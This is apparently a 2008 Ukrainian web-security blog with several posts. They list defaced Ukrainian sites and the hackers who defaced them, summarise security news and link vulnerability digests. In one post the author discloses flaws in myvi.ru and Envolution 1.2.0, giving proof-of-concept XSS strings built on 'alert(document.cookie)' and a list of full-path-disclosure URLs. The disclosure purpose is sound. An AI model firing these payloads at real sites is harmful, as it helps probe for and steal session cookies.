Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

П’ятірка похаканих сайтів в Уанеті:

• http://praktika.net.ua (хакером David Webb) - сайт був похаканий 11.08.2008, зараз він вже виправлений адмінами
• http://marx.org.ua (хакером MadBug) - сайт був похаканий 06.08.2008, зараз він вже виправлений адмінами
• http://www.forsex.org.ua (хакером FeDeReR) - черговий сайт, похаканий грузинським хакером FeDeReR
• http://www.parsuna.com.ua (хакером 3RqU) - сайт був похаканий 05.08.2008, зараз він вже виправлений адмінами
• http://www.shyr.sumy.org (хакером KatiL_Gakal) - був похаканий форум проекту, орієнтовно 10.03.2008 (як і форум finexpert.sumy.ua), що адміни вже виправили (хоча надпис на сайті так і залишився)

На конференції Black Hat USA 2008, що пройшла у Лас Вегасі (США), компанія Microsoft оголосила про намір змінити схему співробітництва з партнерами, що розробляють ПЗ для забезпечення безпеки.

Регулярний вихід оновлень уплинув на розвиток зовнішніх загроз - часом програми атаки нових “проломів” у захисті з’являються вже протягом декількох годин після релізу патча. Наперегони з хакерами виявленням уразливостей займаються і розробники захисного ПЗ. Щоб спростити їхню діяльність і підвищити ефективність захисту користувачів у жовтні нинішнього року почне роботу програма Active Protections Program (MAPP), у рамках якої Microsoft буде інформувати партнерів про виправлення, внесених у систему безпеки новими оновленнями, можливих уразливостях, методах їхнього виявлення й умовах, необхідних для їхнього використання.

Ще одне нововведення дасть можливість користувачам оцінювати ризики при установці оновлень - з жовтня в щомісячному бюлетені безпеки Microsoft буде публікувати Exploitability Index, таблиці, що містять докладні дані про кожну уразливість й імовірність її використання.

По матеріалам http://ko-online.com.ua.

В даній добірці уразливості в веб додатках:

• PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit) (деталі)
• eXV2.de Browser Cookie is not properly sanitised (деталі)
• JobLister3 SQL injection vulnerabilities (деталі)
• Neuron Blog Admin Permission Bypass and Remote File Upload Vulnerability (деталі)
• PHPCentral Poll Script Remote Command Execution Vulnerability (деталі)
• PHPCentral Login Script Remote Command Execution Vulnerability (деталі)
• eyeOS checksum prediction (деталі)
• PhpGedView login page multiple XSS (деталі)
• ePersonnel_RC_2004 Remote File Bug (деталі)
• Directory traversal vulnerability in Jupiter CMS 1.1.5 (деталі)

З 11 учасників хакерського угруповання, що викрало в США дані з 40 млн. платіжних карт, троє виявилися українцями. Міністерство юстиції США пред’явило їм обвинувачення по факту злочину.

Як повідомлялося раніше, хакери підключалися до незахищених бездротових мереж великих магазинів і впроваджували в них програми-сніфери. За допомогою цих програм вони одержували дані про пластикові карти, якими розплачувалися клієнти. По такій же схемі викрадалися дані про банківські карти в ресторанах.

Викрадені дані зберігалися на серверах у США і Східній Європі. Частина з них була продана хакерами іншим шахраям, частина використовувалася для створення дублікатів пластикових карт із метою зняття готівки у банкоматах.

Серед обвинувачуваних троє американців, троє українців, два китайці, один білорус і один естонець. Одинадцятий учасник угруповання відомий тільки під мережевим псевдонімом Delpiero. Усі хакери були затримані в різний час у різних частинах світу.

По матеріалам http://ain.com.ua.

15.03.2008

У серпні, 24.08.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.myvi.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

20.08.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.

В даній добірці експлоіти в веб додатках:

• CMS Faethon 2.2 Ultimate (RFI/XSS) Multiple Remote Vulnerabilies (деталі)
• RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit (деталі)
• Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities (деталі)
• TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit (деталі)
• SazCart 1.5.1 Multiple Remote File Inclusion Vulnerabilities (деталі)
• vShare Youtube Clone 2.6 (tid) Remote SQL Injection Vulnerability (деталі)
• miniBloggie 1.0 (del.php) Arbitrary Delete Post Vulnerability (деталі)
• Cyberfolio 7.12 (rep) Remote File Inclusion Vulnerability (деталі)
• Admidio 1.4.8 (getfile.php) Remote File Disclosure Vulnerability (деталі)
• Sunshop v4.0 <= Blind SQL Injection exploit (деталі)

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та Cross-Site Scripting уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/user.php?module=%22
http://site/user.php?uname=%22
http://site/user.php?upass=%22
http://site/user.php?upassverif=%22
http://site/user.php?email=%22
http://site/user.php?name=%22
http://site/user.php?url=%22
http://site/user.php?timezoneoffset=%22
http://site/user.php?user_avatar=%22
http://site/user.php?user_icq=%22
http://site/user.php?user_aim=%22
http://site/user.php?user_yyim=%22
http://site/user.php?user_msnm=%22
http://site/user.php?user_from=%22
http://site/user.php?user_occ=%22
http://site/user.php?user_intrest=%22
http://site/user.php?user_sig=%22
http://site/user.php?bio=%22
http://site/user.php?agreetoterms=%22
http://site/user.php?femail=%22
http://site/user.php?user_viewemail=%22

XSS:

http://site/print.php?sid=0%2f%2a%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

До кінця липня число листів, що містять віруси, шкідливі програми, а також лінки на них, виросло в порівнянні зі звичайним у кілька разів, говориться в блозі Google для корпоративних клієнтів, де опублікований аналіз поштового трафіка за минулий місяць.

Судячи з представленого пошуковцев графіку, протягом 2008 року щоденне число “шкідливих” листів, адресованих клієнтам Google, рідко перевищувало два мільйони. 24 липня цей показник виріс до майже 10 мільйонів листів. З цими листами поширювалась лінка на відстеження посилки, нібито відправленої через службу UPS. На підробленому сайті користувачам пропонувалося скачати ПЗ, що виявлялося шкідливою програмою.

Google відзначає, що багато розсилок тепер не прикладають шкідливу програму до листа, а лише дають на неї лінку, маскуючи її, наприклад, під новини про останні події. Проте, “традиційні” методи зараження також використовуються. Зокрема, 5 серпня було виявлене велике число повідомлень із зашифрованими RAR-аттачами.

Дані Google засновані на інформації серверів компанії Postini, що займається збереженням пошти користувачів на своїх серверах і забезпеченням безпеки корпоративної пошти. Google купив Postini в 2007 році.

По матеріалам http://itnews.com.ua.

Мені періодично доводиться зіштовхуватися з інфікованими сайтами в Інтернеті, в тому числі й в Уанеті. Взломи сайтів з метою розміщення на них шкідливих кодів стають все більш поширеними з кожним роком. Зазначу, що в своїй статті про стан зараженості Уанета, я приводив дані про стан зараженості Уанета в попередні роки та зпрогнозував стан на 2008 рік.

Раніше я писав про інфікований сайт dn.kiev.ua. Даний сайт був інфіковавний тривалий час - після виявлення мною шкідливого коду на сайті й повідомлення адмінам, довгий час вони не прибирали шкідливий код (проігнорувавши моє попередження і продовжуючи заражати шкідливим кодом відвідувачів сайта). Лише нещодавно вони врешті решт видалили шкідливий код з сайта.

Зараз розповім про ще один заражений сайт. Нещодавно, 17.08.2008, використовуючи Гугл, я виявив, що сайт hip.org.ua інфікований. Раніше мені доводилося чути про цей сайт, і під час пошуку в Гуглі він мені траплявся, але раніше він не був інфікований. Зараз же Google заявив, що “Ця сторінка може заподіяти шкоду вашому комп’ютерові”. Звісно Гугл може й помилятися з такими ярликами, але частіше все ж таки вони вірно відмічають інфіковані сайти.

Після того, як я сам перевірив “Персональний блог Hip” http://hip.org.ua, я впевнився, що він інфікований. На даному сайті розміщений шкідливий іфрейм, що містить велику кількість експлоітів (в зашифрованому вигляді). До речі, іфрейм веде на сторінку з експлоітами, що розміщена на сайті, що має китайський хостинг (причому Пекінський). Схоже, що блог Hip’а взломали з приводу Олімпіади .

Адміну hip.org.ua варто витерти шкідливий код зі свого сайта і почати серйозно слідкувати за безпекою власного сайта. Це варто робити всім блогерам, як і власникам будь-яких сайтів.

В даній добірці уразливості в веб додатках:

• phpCoupon Vulnerabilities (деталі)
• PHPBlogger cookie privilege escalation (деталі)
• Information Leakage in PHPBlogger (деталі)
• Message Board / Threaded Discussion Forum SQL INJECTION (деталі)
• Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection (деталі)
• Real Estate listing website application template SQL Injection (деталі)
• WebStore - Online Store Application Template SQL INJECTION (деталі)
• Berthanas Ziyaretci Defteri v2.0 (tr) Sql (деталі)
• DeskPRO Admin Panel Multiple HTML Injections (деталі)
• Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit (деталі)